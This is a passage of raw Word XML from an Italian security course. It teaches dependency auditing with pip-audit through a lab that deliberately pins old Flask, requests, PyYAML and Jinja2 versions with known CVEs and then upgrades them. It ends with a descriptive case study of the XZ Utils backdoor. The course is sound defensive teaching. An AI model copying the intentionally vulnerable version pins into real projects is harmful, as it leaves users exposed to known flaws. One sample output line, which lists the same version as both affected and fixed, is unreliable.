          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install pip-audit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="386"/>
    <w:bookmarkStart w:id="387" w:name="uso-base"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uso base</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nella cartella di un progetto Python (es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output tipico (su un’app pulita, niente CVE):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">No known vulnerabilities found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se invece il progetto ha dipendenze vulnerabili:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Found 2 known vulnerabilities in 2 packages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Name      Version  ID                    Fix Versions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--------  -------  ---------------------  ------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask     2.0.0    PYSEC-2023-62          2.2.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">werkzeug  2.0.0    PYSEC-2023-58          2.2.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ognuna, ti dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quale CVE/PYSEC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quale versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la corregge.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="387"/>
    <w:bookmarkStart w:id="388" w:name="lab-pratico-forziamo-una-vulnerabilità"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab pratico: forziamo una vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creiamo un progettino</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per imparare. In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir lab-supplychain &amp;&amp; cd lab-supplychain</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python -m venv venv-lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attiva il venv-lab (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.\venv-lab\Scripts\Activate.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Windows). Crea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask==1.0.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests==2.20.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pyyaml==5.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jinja2==2.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Versioni vecchie volute, tutte con CVE noti).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install pip-audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lancia l’audit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vedrai una lista lunga di CVE. Per ognuna, l’output ti dice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pacchetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">versione corrente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ID della vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(PYSEC, GHSA, o CVE)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Versioni che correggono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il problema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio reale di output (tagliato):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Found 17 known vulnerabilities in 4 packages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Name     Version  ID                  Fix Versions</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-------  -------  ------------------  ------------</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask    1.0.0    PYSEC-2019-179      1.0.3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask    1.0.0    PYSEC-2023-62       2.2.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jinja2   2.10     GHSA-462w-v97r-4m45 2.11.3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jinja2   2.10     GHSA-h75v-3vvj-5mfj 2.10.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pyyaml   5.1      GHSA-rprw-h62v-c2w7 5.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pyyaml   5.1      GHSA-8q59-q68h-6hv4 5.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests 2.20.0   PYSEC-2018-28       2.20.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="388"/>
    <w:bookmarkStart w:id="389" w:name="risolvere"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risolvere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiorna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask&gt;=2.2.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requests&gt;=2.32.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pyyaml&gt;=6.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">jinja2&gt;=3.1.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reinstalla:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt --upgrade</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rilancia:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">No known vulnerabilities found</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai sistemato tutte le vulnerabilità in 3 minuti.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Questo è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">minimo sindacale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della gestione supply chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="389"/>
    <w:bookmarkEnd w:id="390"/>
    <w:bookmarkStart w:id="394" w:name="caso-reale-xz-utils-cve-2024-3094"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="sec_9_4"/>
      <w:r>
        <w:t xml:space="preserve">9.4 Caso reale: XZ Utils CVE-2024-3094</w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Marzo 2024. Andres Freund, ingegnere Microsoft, nota che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il demone SSH di Linux) si comporta in modo leggermente strano: usa qualche centinaio di millisecondi in più del solito al login. Investiga. Scopre la backdoor più sofisticata della storia recente del software open source.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="391" w:name="i-fatti"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I fatti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il bersaglio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">xz-utils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una libreria di compressione presente in praticamente ogni distribuzione Linux, usata indirettamente da sshd attraverso la libreria di sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’attaccante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un account chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Jia Tan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, attivo dal 2021. Ha contribuito al progetto xz-utils per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tre anni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, costruendo pazientemente fiducia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il modus operandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dopo essere diventato co-manutentore, ha rilasciato le versioni 5.6.0 e 5.6.1 di xz-utils contenenti una backdoor. La backdoor era nascosta nei file di test (binari opachi che nessuno controlla), e veniva attivata solo durante il processo di build, in modo da non comparire nel codice sorgente del repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa avrebbe permesso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la backdoor avrebbe permesso a chi possiede una specifica chiave privata di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">eseguire codice arbitrario sui server SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del mondo, semplicemente connettendosi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">10.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(massima possibile).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="391"/>
    <w:bookmarkStart w:id="392" w:name="cosa-lo-ha-salvato"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa lo ha salvato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tre fortune:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La backdoor era ancora nelle versioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rolling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delle distribuzioni (Fedora Rawhide, Debian unstable), non nelle release stabili. Pochi utenti coinvolti rispetto al potenziale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andres Freund era un ingegnere meticoloso che si è insospettito per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">300 millisecondi di latenza in più</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La scoperta è avvenuta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che la versione compromessa entrasse in Ubuntu LTS, RedHat, Debian stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se la scoperta fosse arrivata 3 mesi più tardi, sarebbe stato il più grande disastro di sicurezza della storia: l’attaccante avrebbe avuto accesso remoto a milioni di server.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="392"/>
    <w:bookmarkStart w:id="393" w:name="cosa-insegna"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa insegna</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’open source non è automaticamente sicuro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La famosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Linus’s law</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">con abbastanza occhi, tutti i bug sono superficiali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) presuppone che gli occhi guardino davvero. Per i pacchetti molto popolari sì; per quelli meno mantenuti, gli occhi non bastano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La supply chain è un vettore di attacco strategico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Gli attaccanti più sofisticati (probabilmente APT statali) investono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">anni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per piazzare backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anche le firme digitali non bastano</w:t>
